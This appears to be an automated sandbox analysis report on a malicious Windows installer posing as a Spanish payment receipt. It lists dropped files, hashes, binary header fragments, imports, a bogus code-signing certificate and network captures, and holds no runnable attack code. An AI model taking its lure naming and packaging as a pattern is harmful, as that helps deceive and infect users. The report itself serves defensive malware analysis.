                                      Preview:.PNG........IHDR................a...BIDATx.m.S.%9...$U.Fkl.y].m.6.m.F..5*g;k}.........P......~u................M......M.q......|OM>....:?>.X7.U..j.v..?...e....>.Jk.&.{.[=......t.d.....4.D...V....b..s.L.....Jg,..=V..@.n......Rqv...._....B.h.;l....A....r.ap....N...1./.O.2.u7#..../.....o..*..O...[..X,<. .....@v........t...H..Rf..C?q..8.HB.!{K..N.....t..5..1d.+......).......pL.5.R..=....jC"....t6.BA.)....xZ..d..^W~yU...ya......U/...VA.r.....r.U....[".D.).8..iO<..[.....t.e9S...K8!....K..&p..Y2l.....".P8:..v..0....zd..''....O?+^.. =..b....t..K../.......?.?5...c.[.f.nP.P.o....7..k..t.?P(..O>.H~...n..jh.'..]..SC.5M.....'.}.n..'...t..9..c*...Ki...t..1z..N.q...w.w..y..W...K7x.^..p....j...%..3.|.....x...G.|~..a.o.N.<.......wK...]..u..........`...(z.B!.?q.b..u..$(.#1..N...b.u...@h...|.w..g....}i....?~......1~...l..]h......IEND.B`.
                                      Process:C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):14952
                                      Entropy (8bit):6.599053939997928
                                      Encrypted:false
                                      SSDEEP:192:mrlnC6xxk2R5Ws+Wql73WOL8/pCuPHnhWgN7aoWTF6lI+XqnajlkEv:6nbW2R5Ws+Wql7//uPHRN7SIImlqW
                                      MD5:EDA04E04EBC0EBF7F8BBF30C4DAE6DE3
                                      SHA1:7BC4D50E6EEC7F04A9272BFEE4E4DB6F278DBE63
                                      SHA-256:F3E55CB3ADFA93F563B09114D93062E680AB0864C220491458FBE151798B862F
                                      SHA-512:7027DA3404675596B71394B660E600DA12C0750895F624776362167869760555EE9990699FFC9E4407301FC9437B2F638E2734B8BDEF3C7054990FD5A9C86550
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Joe Sandbox View:
                                      • Filename: rFACTURA_FAC_2023_1-1000733.PDF.exe, Detection: malicious, Browse
                                      • Filename: rAEAT-AvisodeNotificaci__n.exe, Detection: malicious, Browse
                                      • Filename: rFACTURA_FAC_2023_1-1000733.PDF.exe, Detection: malicious, Browse
                                      • Filename: AEAT-Notificaci#U00f3n..rar, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."!..0.............^+... ........@.. ....................................`..................................+..K....@..................h$...`......T*..8............................................ ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@+......H........ ......................P ......................................H>.s..X.\...3V...?G../..3q..l.L.....qKy6b..u"HO...JmYQ.....J..,.*S..".R..=1RY.....\?.&dM........@'J.j.:.'.A.../..........I.BSJB............v4.0.30319......`.......#~..........#Strings............#GUID...........#Blob......................3......................................3.........@...........Y...................`.................g...?.g.....g...y.g.....g.....g.....g...`.g...m.g.................
                                      Process:C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe
                                      File Type:ASCII text, with very long lines (36518), with no line terminators
                                      Category:dropped
                                      Size (bytes):36518
                                      Entropy (8bit):2.6830744752603626
                                      Encrypted:false
                                      SSDEEP:768:xeK/i8OrT1EEEN7NmGmBsb7IxbJhOANjoIi55GP++IssSCDu/2qnSsUHZll:xeKv2n1OAE/EP9Ka/2lHzl
                                      MD5:AE738FA62A77E7AC245E166294F62CF4
                                      SHA1:EB347C2E02E3FBB39D316CEE73ED4B72DCA34C41
                                      SHA-256:4513093A8A81A33B2704FA5C8D168172A4A561188992D2AE1C93E1AF0611C076
                                      SHA-512:5B1241A8702E25C84D64CD7B6790852B46FA0848B16056FCFA0035CEAB1AB3448953D3FDF15DE7BB7D0074C7EC7E94748CFEDA625621E3BA5BFB3C4D813C82E2
                                      Malicious:false
                                      Preview:000000007E0000000F0F00C2007C009494000000C100000000860000000000E1E1E100575757000000000000000D007A7A0000000025252500000000292900000082000017170000FCFC00050505006100000000C500B500AC0077777700D8D8D8000000FE00BC002100000000009300003900787878787800BEBE0000FE0000EE000075757500ACACAC001E1E0000005C000000000000000D0D0D0D0D0D0D0000005200140008000000004F4F000000006000006B6B6B0017001E006000DA0055550000004A4A00000000001400005757575757003B3B00010000E1E1005757575757005A5A000000A9A9009E005A5A00D7D7D700610000C90000000000D0D0D0D000A4A400007F00000000006A6A0000CA00007B7B00E2008E8E8E00B100D30000BBBBBB00E8000000000077770063636300002600DE00E3E3E3000028001212000000000000007A7A0000CE00EC007676760000005757009F9F00AD00A5A5003D004C4C4C0000003131310000ACACAC000054000000000000000000000000F3F300292900000000020074000000BA00000200000000A8000000AB00000000004C4C4C4C4C00007E000000000000000000888800D2D2000202020200A3A3A3000000E70000FE0000970000860000C4000000170000005E0000BC00F9000000AA000000FA00A9000083000000C3C3C300777700
                                      Process:C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe
                                      File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):32368
                                      Entropy (8bit):6.393948275188786
                                      Encrypted:false
                                      SSDEEP:384:yWweWqlXnYcLpSfX0lawccfNXLWrdzy+A2jc2EPLNtAf/uPHRN7AJ/AlGseC62c:EqlXYcgEAwcc17Wc+bj+PLHuMU/xjx2c
                                      MD5:F2A123183E106BB1CF19376A8079D171
                                      SHA1:2B96296BE92D5F2EF7C59A70858AF4CAABC99A9D
                                      SHA-256:896D4ED138C35ECF19AE432380096562872EAB103F7E352C15D214FD875B337A
                                      SHA-512:FCA6A89EFB16780A06CD25A55638882970F03E1535180A0E463AF9794184B04EB345CF29B12D4F261094E04A584E9225A7AD36A62631227451059F64A77B3C67
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....[............" .....P................................................................`...@......@............... ......................................<........Z..p$...p..........T...............................................................H............text....N.......P.................. ..`.data........`.......R..............@....reloc.......p.......X..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...................y.........?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...Z.!...C.o.m.m.e.n.t.s...S.y.s.t.e.m...R.e.f.l.e.c.t.i.o.n...T.y.p.e.E.x.t.e.n.s.i.o.n.s.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...j.!...F.i.l.e.D.e.s.c.r.i.p.
                                      Process:C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe
                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):225
                                      Entropy (8bit):6.596645802250635
                                      Encrypted:false
                                      SSDEEP:6:6v/lhPysi5NuhsPwRngRfPq/3+phjSfVsup:6v/7thstJACSNsc
                                      MD5:F894266AB6A933B2FDA751E6490C319A
                                      SHA1:2D2D3635198FEEFCB64D1D6B3CDCCDC4EA3DF4B0
                                      SHA-256:95F533585B4C61936C369557B3B7E397E56545A4C9DB9A5BDDD0E9ABB7A7F7E7
                                      SHA-512:977ED04753C3CB2B883D03A2A55001F6FCC8617DC3060B6C25AB7E5C691C3F76049E7DEADC7F6567AB7E8DC8492DE2874E8E632CF3EAD7B39ABC8CC98D331442
                                      Malicious:false
                                      Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8..1..@.E...".u.`..#.v.,r.[..1$..]B.@6.,,.e.....fwg...._)9........y..[n...t.$g..:...P....@k.q......W.. .PY.$z..x....t..(-~!.0$:P.t......`.......Ba..Y.....IEND.B`.
                                      Process:C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe
                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):263
                                      Entropy (8bit):6.731374842054556
                                      Encrypted:false
                                      SSDEEP:6:6v/lhPysw9TXm0RZC/8xhbPgfdSwj4vw29OjuAO4+ZvYNVp:6v/7QVXm0a/8xhbPgfdSBvNYn2ZvYd
                                      MD5:003B524806C1CA654CAC6ED2EB883E1B
                                      SHA1:F6F6ACA125DC4DB3B33378404017B5EE7D21D334
                                      SHA-256:2899E53769FA741E2C0675A2C69D2C246A8F34601BEE58DD66B16261005962A9
                                      SHA-512:AA905997F9CE39F039E33C4CCA167C0137775D91B4929D918528BA00B92737C448EC46D91A4221644CCC00D1FCAA403AFF83F07276BAB6FD80D4B9E88E652F87
                                      Malicious:false
                                      Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8...K..1.D......g.e=.x......[]....Y$J'..`.@.S)R.4.q.D.K....x..%..0>~.;}..^.X....Lt.f!..K.....D.&,.7,..BM..t@..}N..o.?.....Hv.J...(..r.. ..)L....&..dT<..1y...X..X...............q...p..p.....IEND.B`.
                                      Process:C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe
                                      File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):337
                                      Entropy (8bit):7.143668471552015
                                      Encrypted:false
                                      SSDEEP:6:6v/lhPWFmX9Ckymx8BZhCjO5QO6MsHqd+K/eBDQeU2oG9xqgjp:6v/7K0omx8yOqVtHH1U2oGR
                                      MD5:7FBFE5B0A7AD2A67AACFD8481F8DCA01
                                      SHA1:21BABB6B7EC4746835DB43DC6A69A4AF0EFECA2D
                                      SHA-256:0B4CD789E087F712F131FACCD754DC461774498DF3CA19B346D461D18A0AE622
                                      SHA-512:3A8F0D9653301F789A0588E848C40FFC92394461BF70A3421ABC85647F2C115948134FE9E161D055A11D200536356A15677D9C0E645346D27E122001F67FE22B
                                      Malicious:false
                                      Preview:.PNG........IHDR................a....IDATx..S.r.P..=7.cw.....W.m...=......V....I...K.?#@D.0G......R.rF..^$....p..b..f.<.T.z......... +..3#.v.K...$....pT.j.....[.......r..p....O.2.Y.T.,......==...9{/...T./....Qa...3%....5...xmkI.7.1..P,g.%y..J..#^.e..I(.%jzI..#../..49...*..?#..I. =~..E.,MN@........`...../...=.-...1....IEND.B`.
                                      Process:C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):222555
                                      Entropy (8bit):7.344342205951728
                                      Encrypted:false
                                      SSDEEP:3072:pBmSzQUCQ7eiGVj+oHu80OFKzRem/0qaVnuHyAkwbH4A5ICfxHSdjByvg4T:fmioZd+osLdL/0FuVTjAuypPo
                                      MD5:1247D9E48508188AEA42C1860C123BDB
                                      SHA1:B94FAE1C07539802B0D102309BA9B6F2A10C2638
                                      SHA-256:C6FAD708D2D267FA214B467BA745F085BE0F86DE24F1CBD6DB02F9A168359668
                                      SHA-512:C2A18EA7DE077087EF70780D10796F338C7FD9764777E33F6AB6B68F32E370DC063AC463A1AF6299A9A50F8410352E5CC9D90F290389D7531F6B4A5666459BFD
                                      Malicious:false
                                      Preview:...........;;;............................................C.............y................|||.....6..............................................................ppp..........77.........X.......)))......MM.......;;...........................FFFFFF..............RR.................00....;;;;;;...........5........uu.........).......dd................t................L.q.)..y.....++............5.........**...........L....<.!......o..................((..AAA...............VVV..WW...xxx..w.............4444..*.....f...............D.....T.....yyy...............!!..jj..bb.ccccc.B...1...;..........V.............g..q.........v....,..xxxx...Z.{..........................................&...m...........www..$$.....b.M.......$.....YYYY.........bb.....j..iiiii...&........D.gg......~.................)))..000.FFFF.n........._.........---..........................g..............................##.........................))).Y.**.........................c.............bb........9.........T....................
                                      Process:C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):6144
                                      Entropy (8bit):4.496995234059773
                                      Encrypted:false
                                      SSDEEP:96:1IUNaXnnXyEIPtXvZhr5RwiULuxDtJ1+wolpE:1Ix3XyEwXvZh1RwnLUDtf+I
                                      MD5:E8B67A37FB41D54A7EDA453309D45D97
                                      SHA1:96BE9BF7A988D9CEA06150D57CD1DE19F1FEC19E
                                      SHA-256:2AD232BCCF4CA06CF13475AF87B510C5788AA790785FD50509BE483AFC0E0BCF
                                      SHA-512:20EFFAE18EEBB2DF90D3186A281FA9233A97998F226F7ADEAD0784FBC787FEEE419973962F8369D8822C1BBCDFB6E7948D9CA6086C9CF90190C8AB3EC97F4C38
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 3%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+.Y.o.7Eo.7Eo.7Eo.6EF.7E..jEf.7E;..Em.7E..3En.7ERicho.7E........PE..L.....uY...........!................`........ ...............................P......................................`$..E.... ..d............................@..$.................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):11776
                                      Entropy (8bit):5.659384359264642
                                      Encrypted:false
                                      SSDEEP:192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
                                      MD5:8B3830B9DBF87F84DDD3B26645FED3A0
                                      SHA1:223BEF1F19E644A610A0877D01EADC9E28299509
                                      SHA-256:F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
                                      SHA-512:D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 1%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):7.031249628696672
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:rJUSTIFICANTEDEPAGO.exe
                                      File size:433352
                                      MD5:e542cf9ce8a67a5b681cc9b0004e0b10
                                      SHA1:40161158f7cab76c57b4d95798c74ebc7d612cfe
                                      SHA256:4e78f6957f4c8c0f56a9b49e139342b1df7b1dc05518d96e776aa687a80f8c58
                                      SHA512:5cb1f2132c5d85f068ed5fc35229df5f83d711f30748a951bd006569a24df0818aa24effb91d171a895f342b1b9e14ad2df8a2f1124e1ef2c7f8c74a6b9627ce
                                      SSDEEP:6144:c6bAcJvkzKmPPzS58G93IuZjZz5VWY+LWWwseVp4ZLlbXrvAhM8LjbL7rrraAiGl:z7ubCHICV0LfwqZLlXTqMYvi7
                                      TLSH:CA94F1227F97E857E4266D78608AEE19AEB0DF249205D317F37139EDE9B53016C2B103
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....uY.................d....:....
                                      Icon Hash:20c4f8f8e8f0f24c
                                      Entrypoint:0x403350
                                      Entrypoint Section:.text
                                      Digitally signed:true
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x59759518 [Mon Jul 24 06:35:04 2017 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:b34f154ec913d2d2c435cbd644e91687
                                      Signature Valid:false
                                      Signature Issuer:E=Baccheion@Train.Ric, OU="Ukampdygtige Ratteners Fllesskolernes ", O=Amerciament, L=Putnam Valley, S=New York, C=US
                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                      Error Number:-2146762487
                                      Not Before, Not After
                                      • 21/12/2022 05:52:29 20/12/2025 05:52:29
                                      Subject Chain
                                      • E=Baccheion@Train.Ric, OU="Ukampdygtige Ratteners Fllesskolernes ", O=Amerciament, L=Putnam Valley, S=New York, C=US
                                      Version:3
                                      Thumbprint MD5:9D5FC1EED3EFD5AE85C5FE4E5DE73B01
                                      Thumbprint SHA-1:5C6F3AFCFAAFE00B47463625067078E82ACF72F1
                                      Thumbprint SHA-256:29E893BEBBB82AB1F213286EF68814B75D778BAB740B54B6457C756488BE3856
                                      Serial:53BB1A3E0600B528584097460509366C59C5C7CB
                                      Instruction
                                      sub esp, 000002D4h
                                      push ebx
                                      push esi
                                      push edi
                                      push 00000020h
                                      pop edi
                                      xor ebx, ebx
                                      push 00008001h
                                      mov dword ptr [esp+14h], ebx
                                      mov dword ptr [esp+10h], 0040A2E0h
                                      mov dword ptr [esp+1Ch], ebx
                                      call dword ptr [004080A8h]
                                      call dword ptr [004080A4h]
                                      and eax, BFFFFFFFh
                                      cmp ax, 00000006h
                                      mov dword ptr [007A8A2Ch], eax
                                      je 00007FCB90F077D3h
                                      push ebx
                                      call 00007FCB90F0AA69h
                                      cmp eax, ebx
                                      je 00007FCB90F077C9h
                                      push 00000C00h
                                      call eax
                                      mov esi, 004082B0h
                                      push esi
                                      call 00007FCB90F0A9E3h
                                      push esi
                                      call dword ptr [00408150h]
                                      lea esi, dword ptr [esi+eax+01h]
                                      cmp byte ptr [esi], 00000000h
                                      jne 00007FCB90F077ACh
                                      push 0000000Ah
                                      call 00007FCB90F0AA3Ch
                                      push 00000008h
                                      call 00007FCB90F0AA35h
                                      push 00000006h
                                      mov dword ptr [007A8A24h], eax
                                      call 00007FCB90F0AA29h
                                      cmp eax, ebx
                                      je 00007FCB90F077D1h
                                      push 0000001Eh
                                      call eax
                                      test eax, eax
                                      je 00007FCB90F077C9h
                                      or byte ptr [007A8A2Fh], 00000040h
                                      push ebp
                                      call dword ptr [00408044h]
                                      push ebx
                                      call dword ptr [004082A0h]
                                      mov dword ptr [007A8AF8h], eax
                                      push ebx
                                      lea eax, dword ptr [esp+34h]
                                      push 000002B4h
                                      push eax
                                      push ebx
                                      push 0079FEE0h
                                      call dword ptr [00408188h]
                                      push 0040A2C8h
                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3d00000x28268.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x67a880x2240.data
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x63c80x6400False0.6766015625data6.504099201068482IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x80000x138e0x1400False0.4509765625data5.146454805063938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0xa0000x39eb380x600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .ndata0x3a90000x270000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x3d00000x282680x28400False0.3355129076086957data4.767250735975199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountry
                                      RT_ICON0x3d03100x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States
                                      RT_ICON0x3e0b380x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States
                                      RT_ICON0x3e9fe00x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736EnglishUnited States
                                      RT_ICON0x3ef4680x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States
                                      RT_ICON0x3f36900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States
                                      RT_ICON0x3f5c380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States
                                      RT_ICON0x3f6ce00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States
                                      RT_ICON0x3f76680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States
                                      RT_DIALOG0x3f7ad00x100dataEnglishUnited States
                                      RT_DIALOG0x3f7bd00xf8dataEnglishUnited States
                                      RT_DIALOG0x3f7cc80xa0dataEnglishUnited States
                                      RT_DIALOG0x3f7d680x60dataEnglishUnited States
                                      RT_GROUP_ICON0x3f7dc80x76dataEnglishUnited States
                                      RT_MANIFEST0x3f7e400x423XML 1.0 document, ASCII text, with very long lines (1059), with no line terminatorsEnglishUnited States
                                      DLLImport
                                      KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                      USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                      SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                      ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                      COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                      ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States
                                      TimestampSource PortDest PortSource IPDest IP
                                      Mar 20, 2023 11:23:11.148125887 CET49816443192.168.11.20172.217.16.206
                                      Mar 20, 2023 11:23:11.148149967 CET44349816172.217.16.206192.168.11.20
                                      Mar 20, 2023 11:23:11.148309946 CET49816443192.168.11.20172.217.16.206
                                      Mar 20, 2023 11:23:11.161170959 CET49816443192.168.11.20172.217.16.206
                                      Mar 20, 2023 11:23:11.161183119 CET44349816172.217.16.206192.168.11.20
                                      Mar 20, 2023 11:23:11.193301916 CET44349816172.217.16.206192.168.11.20
                                      Mar 20, 2023 11:23:11.193433046 CET49816443192.168.11.20172.217.16.206
                                      Mar 20, 2023 11:23:11.193612099 CET49816443192.168.11.20172.217.16.206
                                      Mar 20, 2023 11:23:11.194029093 CET44349816172.217.16.206192.168.11.20
                                      Mar 20, 2023 11:23:11.194288969 CET49816443192.168.11.20172.217.16.206
                                      Mar 20, 2023 11:23:11.265213013 CET49816443192.168.11.20172.217.16.206
                                      Mar 20, 2023 11:23:11.266252041 CET44349816172.217.16.206192.168.11.20
                                      Mar 20, 2023 11:23:11.266392946 CET49816443192.168.11.20172.217.16.206
                                      Mar 20, 2023 11:23:11.269294024 CET49816443192.168.11.20172.217.16.206
                                      Mar 20, 2023 11:23:11.312500000 CET44349816172.217.16.206192.168.11.20
                                      Mar 20, 2023 11:23:11.548156977 CET44349816172.217.16.206192.168.11.20
                                      Mar 20, 2023 11:23:11.548352957 CET49816443192.168.11.20172.217.16.206
                                      Mar 20, 2023 11:23:11.548438072 CET44349816172.217.16.206192.168.11.20
                                      Mar 20, 2023 11:23:11.548583984 CET49816443192.168.11.20172.217.16.206
                                      Mar 20, 2023 11:23:11.548625946 CET44349816172.217.16.206192.168.11.20
                                      Mar 20, 2023 11:23:11.548651934 CET49816443192.168.11.20172.217.16.206
                                      Mar 20, 2023 11:23:11.548688889 CET44349816172.217.16.206192.168.11.20
                                      Mar 20, 2023 11:23:11.548733950 CET44349816172.217.16.206192.168.11.20
                                      Mar 20, 2023 11:23:11.548985958 CET49816443192.168.11.20172.217.16.206
                                      Mar 20, 2023 11:23:11.548985958 CET49816443192.168.11.20172.217.16.206
                                      Mar 20, 2023 11:23:11.548985958 CET49816443192.168.11.20172.217.16.206
                                      Mar 20, 2023 11:23:11.641153097 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:11.641195059 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:11.641344070 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:11.641753912 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:11.641777992 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:11.681567907 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:11.681797981 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:11.681797981 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:11.682383060 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:11.682543039 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:11.682563066 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:11.685803890 CET49817443192.168.11.20142.250.186.33
                                      Mar 20, 2023 11:23:11.685817957 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:11.686108112 CET44349817142.250.186.33192.168.11.20
                                      Mar 20, 2023 11:23:11.686331034 CET49817443192.168.11.20142.250.186.33
